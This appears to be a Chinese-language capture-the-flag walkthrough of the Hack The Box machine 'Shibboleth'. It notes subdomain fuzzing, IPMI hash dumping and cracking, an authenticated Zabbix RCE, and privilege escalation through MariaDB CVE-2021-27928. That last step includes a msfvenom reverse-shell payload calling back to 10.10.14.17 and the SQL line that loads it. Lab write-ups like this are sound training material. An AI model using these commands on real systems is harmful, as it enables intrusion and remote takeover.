
nmap扫描



添加hosts文件

扫目录

在利用wfuzz扫一遍子域名
字典:https://github.com/danielmiessler/SecLists
wfuzz -u http://shibboleth.htb -H "Host: FUZZ.shibboleth.htb" -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --hw 26

添加hosts文件

登录框,标题为zabbix,搜一下

但是版本不明确
扫目录

扫出来的大多都需要登录才能访问
在扫一遍udp端口


623开放了一个asf-rmcp服务,不认识搜一下
https://hacktricks.boitatech.com.br/pentesting/623-udp-ipmi

好像可以枚举ipmi服务的用户名和密码


尝试解密

搜索类型为7300
hashcat -m 7300 hash /usr/share/wordlists/rockyou.txt

登录

知道了当前ZABBIX的版本

有一个身份验证后的rce



漏洞产生点在hosts->key这里

提权

10050和10051不知道是什么服务,本地还开放有3306,但配置文件无权读取

存在另外一个普通用户,尝试用之前破解的哈希密码切换

提权

获取数据库的账号密码

MariaDB数据库第一次见,搜一下


https://github.com/Al1ex/CVE-2021-27928
用法也挺简单

先msf生成一个so后门
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=7777 -f elf-so -o cve.so

让靶机下载

在连接数据库后进行加载后门
SET GLOBAL wsrep_provider="/tmp/cve.so";

